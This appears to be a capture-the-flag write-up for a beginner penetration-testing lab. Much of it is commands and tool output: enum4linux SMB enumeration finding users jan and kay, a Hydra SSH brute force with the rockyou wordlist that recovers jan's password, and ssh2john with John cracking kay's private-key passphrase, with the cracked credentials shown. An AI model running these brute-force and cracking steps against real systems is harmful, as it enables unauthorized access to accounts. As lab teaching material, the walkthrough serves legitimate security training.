User brute-forcing to find the username & password
Running Enum4Linux - To enumerate SMB
enum4linux-a10.10.21.87Startingenum4linuxv0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Mar 9 22:26:17 2021 ========================== |TargetInformation| ========================== Target...........10.10.21.87RIDRange........500-550,1000-1050Username.........''Password.........''KnownUsernames..administrator,guest,krbtgt,domainadmins,root,bin,none =================================================== |EnumeratingWorkgroup/Domainon10.10.21.87| =================================================== [+] Got domain/workgroup name: WORKGROUP =========================================== |NbtstatInformationfor10.10.21.87| =========================================== Lookingupstatusof10.10.21.87BASIC2<00>-B<ACTIVE>WorkstationServiceBASIC2<03>-B<ACTIVE>MessengerServiceBASIC2<20>-B<ACTIVE>FileServerService..__MSBROWSE__. <01>-<GROUP>B<ACTIVE>MasterBrowserWORKGROUP<00>-<GROUP>B<ACTIVE>Domain/WorkgroupNameWORKGROUP<1d>-B<ACTIVE>MasterBrowserWORKGROUP<1e>-<GROUP>B<ACTIVE>BrowserServiceElectionsMACAddress=00-00-00-00-00-00 ==================================== |SessionCheckon10.10.21.87| ==================================== [+] Server 10.10.21.87 allows sessions using username '', password '' ========================================== |GettingdomainSIDfor10.10.21.87| ========================================== DomainName:WORKGROUPDomainSid: (NULL SID)[+] Cant determine ifhostispartofdomainorpartofaworkgroup ===================================== |OSinformationon10.10.21.87| ===================================== Useofuninitializedvalue $os_info inconcatenation (.) or string at ./enum4linux.pl line 464.[+] Got OS info for 10.10.21.87 from smbclient: [+] Got OS info for 10.10.21.87 from srvinfo:BASIC2WkSvPrQUnxNTSNTSambaServer4.3.11-Ubuntuplatform_id:500osversion:6.1servertype:0x809a03 ============================ |Userson10.10.21.87| ============================ Useofuninitializedvalue $users inprintat./enum4linux.plline874.Useofuninitializedvalue $users inpatternmatch (m//) at ./enum4linux.pl line 877.Useofuninitializedvalue $users inprintat./enum4linux.plline888.Useofuninitializedvalue $users inpatternmatch (m//) at ./enum4linux.pl line 890. ======================================== |ShareEnumerationon10.10.21.87| ======================================== SharenameTypeComment--------------------AnonymousDiskIPC$IPCIPCService (Samba Server4.3.11-Ubuntu)SMB1disabled--noworkgroupavailable[+] Attempting to map shares on 10.10.21.87//10.10.21.87/AnonymousMapping:OK,Listing:OK//10.10.21.87/IPC$ [E] Cant understand response:NT_STATUS_OBJECT_NAME_NOT_FOUNDlisting \* =================================================== |PasswordPolicyInformationfor10.10.21.87| =================================================== [+] Attaching to 10.10.21.87 using a NULL share[+] Trying protocol 139/SMB...[+] Found domain(s): [+] BASIC2 [+] Builtin[+] Password Info for Domain: BASIC2 [+] Minimumpasswordlength:5 [+] Passwordhistorylength:None [+] Maximumpasswordage:37days6hours21minutes [+] PasswordComplexityFlags:000000 [+] DomainRefusePasswordChange:0 [+] DomainPasswordStoreCleartext:0 [+] DomainPasswordLockoutAdmins:0 [+] DomainPasswordNoClearChange:0 [+] DomainPasswordNoAnonChange:0 [+] DomainPasswordComplex:0 [+] Minimumpasswordage:None [+] ResetAccountLockoutCounter:30minutes [+] LockedAccountDuration:30minutes [+] AccountLockoutThreshold:None [+] ForcedLogoffTime:37days6hours21minutes[+] Retieved partial password policy with rpcclient:PasswordComplexity:DisabledMinimumPasswordLength:5 ============================= |Groupson10.10.21.87| ============================= [+] Getting builtin groups:[+] Getting builtin group memberships:[+] Getting local groups:[+] Getting local group memberships:[+] Getting domain groups:[+] Getting domain group memberships: ====================================================================== |Userson10.10.21.87viaRIDcycling (RIDS: 500-550,1000-1050) | ====================================================================== [I] Found new SID: S-1-22-1[I] Found new SID: S-1-5-21-2853212168-2008227510-3551253869[I] Found new SID: S-1-5-32[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''S-1-5-21-2853212168-2008227510-3551253869-500*unknown*\*unknown* (8)S-1-5-21-2853212168-2008227510-3551253869-501BASIC2\nobody (Local User)S-1-5-21-2853212168-2008227510-3551253869-502*unknown*\*unknown* (8)..S-1-5-21-2853212168-2008227510-3551253869-1050*unknown*\*unknown* (8)[+] Enumerating users using SID S-1-5-32 and logon username '', password ''S-1-5-32-500*unknown*\*unknown* (8)..S-1-5-32-543*unknown*\*unknown* (8)S-1-5-32-544BUILTIN\Administrators (Local Group)S-1-5-32-545BUILTIN\Users (Local Group)S-1-5-32-546BUILTIN\Guests (Local Group)S-1-5-32-547BUILTIN\PowerUsers (Local Group)S-1-5-32-548BUILTIN\AccountOperators (Local Group)S-1-5-32-549BUILTIN\ServerOperators (Local Group)S-1-5-32-550BUILTIN\PrintOperators (Local Group)S-1-5-32-1000*unknown*\*unknown* (8)..S-1-5-32-1050*unknown*\*unknown* (8)[+] Enumerating users using SID S-1-22-1 and logon username '', password ''S-1-22-1-1000UnixUser\kay (Local User)S-1-22-1-1001UnixUser\jan (Local User) ============================================ |Gettingprinterinfofor10.10.21.87| ============================================ Noprintersreturned.
We find two user names - jan and kay.
Now we'll try to bruteforce the password of jan.
Because, in the /development directory, we had a text file in which K (refers to kay) mentioned that the password of J (refers to jan) was easily crackable.
HYDRA:
Using Hydra to bruteforce the username and password
hydra-ljan-P/usr/share/wordlists/rockyou.txtssh://10.10.21.87-t4|teehydra.outHydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-09 22:14:13[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task[DATA] attacking ssh://10.10.21.87:22/[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344355 to doin 5433:29h, 4 active[STATUS] 28.00 tries/min, 84 tries in 00:03h, 14344315 to doin 8538:17h, 4 active[STATUS] 29.14 tries/min, 204 tries in 00:07h, 14344195 to doin 8203:23h, 4 active[STATUS] 28.07 tries/min, 421 tries in 00:15h, 14343978 to doin 8517:49h, 4 active[22][ssh] host: 10.10.21.87 login: jan password: armando1of1targetsuccessfullycompleted,1validpasswordfoundHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-09 22:43:05
It's asking for a password. But, we don't have it yet.
What is the name of the other user you found(all lower case)?
Answer: kay
If you have found another user, what can you do with this information?
Answer: We can try to escalate our privileges to gain root access. May be that user can have additional permissions which can be exploited to gain root access.
Now, we'll try to brute force the ssh passphrase using john.
Convert the id_rsa file using ssh2john.py so that it can be fed to John for bruteforcing the passphrase.
root@kali:usr/share/john/ssh2john.pykay_id_rsa>forjohn.txtrrot@kali:johnforjohn.txt--wordlist=/usr/share/wordlists/rockyou.txtUsingdefaultinputencoding:UTF-8Loaded1passwordhash (SSH [RSA/DSA/EC/OPENSSH (SSH privatekeys) 32/64])Cost1 (KDF/cipher [0=MD5/AES 1=MD5/3DES2=Bcrypt/AES]) is 0 for all loaded hashesCost2 (iteration count) is 1 for all loaded hashesNote:Thisformatmayemitfalsepositives,soitwillkeeptryingevenafterfindingapossiblecandidate.Press'q'orCtrl-Ctoabort,almostanyotherkeyforstatusbeeswax (kay_id_rsa)Sessioncompleted
Login using the the ssh private key and provide the passphrase.
Sometimes we can get the private key (id_rsa) through a variety of scenarios, like if we had read access due to LFI or even command injection allowing us to execute certain commands.